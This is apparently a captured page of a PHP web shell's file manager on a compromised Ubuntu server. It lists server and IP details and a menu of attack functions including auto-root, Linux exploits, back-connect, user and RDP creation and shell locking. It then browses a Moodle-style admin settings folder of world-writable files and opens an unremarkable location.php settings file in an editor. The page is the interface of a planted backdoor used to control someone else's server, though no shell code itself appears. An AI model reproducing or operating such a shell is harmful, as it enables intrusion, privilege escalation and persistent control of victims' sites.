Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
admin /
settings /
[ HOME SHELL ]
Name
Size
Permission
Action
appearance.php
18.55
KB
-rwxrwxrwx
badges.php
3.77
KB
-rwxrwxrwx
courses.php
16.77
KB
-rwxrwxrwx
development.php
6.58
KB
-rwxrwxrwx
frontpage.php
5.55
KB
-rwxrwxrwx
grades.php
14.89
KB
-rwxrwxrwx
language.php
1.57
KB
-rwxrwxrwx
location.php
1.73
KB
-rwxrwxrwx
mnet.php
3
KB
-rwxrwxrwx
plugins.php
26.63
KB
-rwxrwxrwx
security.php
12.18
KB
-rwxrwxrwx
server.php
23.37
KB
-rwxrwxrwx
subsystems.php
3.88
KB
-rwxrwxrwx
top.php
3.28
KB
-rwxrwxrwx
users.php
9.69
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : location.php
<?php if ($hassiteconfig) { // speedup for non-admins, add all caps used on this page // "locations" settingpage $temp = new admin_settingpage('locationsettings', new lang_string('locationsettings', 'admin')); $options = get_list_of_timezones(); $options[99] = new lang_string('serverlocaltime'); $temp->add(new admin_setting_configselect('timezone', new lang_string('timezone','admin'), new lang_string('configtimezone', 'admin'), 99, $options)); $options[99] = new lang_string('timezonenotforced', 'admin'); $temp->add(new admin_setting_configselect('forcetimezone', new lang_string('forcetimezone', 'admin'), new lang_string('helpforcetimezone', 'admin'), 99, $options)); $temp->add(new admin_settings_country_select('country', new lang_string('country', 'admin'), new lang_string('configcountry', 'admin'), 0)); $temp->add(new admin_setting_configtext('defaultcity', new lang_string('defaultcity', 'admin'), new lang_string('defaultcity_help', 'admin'), '')); $temp->add(new admin_setting_heading('iplookup', new lang_string('iplookup', 'admin'), new lang_string('iplookupinfo', 'admin'))); $temp->add(new admin_setting_configfile('geoipfile', new lang_string('geoipfile', 'admin'), new lang_string('configgeoipfile', 'admin', $CFG->dataroot.'/geoip/'), $CFG->dataroot.'/geoip/GeoLiteCity.dat')); $temp->add(new admin_setting_configtext('googlemapkey3', new lang_string('googlemapkey3', 'admin'), new lang_string('googlemapkey3_help', 'admin'), '', PARAM_RAW, 60)); $temp->add(new admin_setting_configtext('allcountrycodes', new lang_string('allcountrycodes', 'admin'), new lang_string('configallcountrycodes', 'admin'), '', '/^(?:\w+(?:,\w+)*)?$/')); $ADMIN->add('location', $temp); } // end of speedup
Close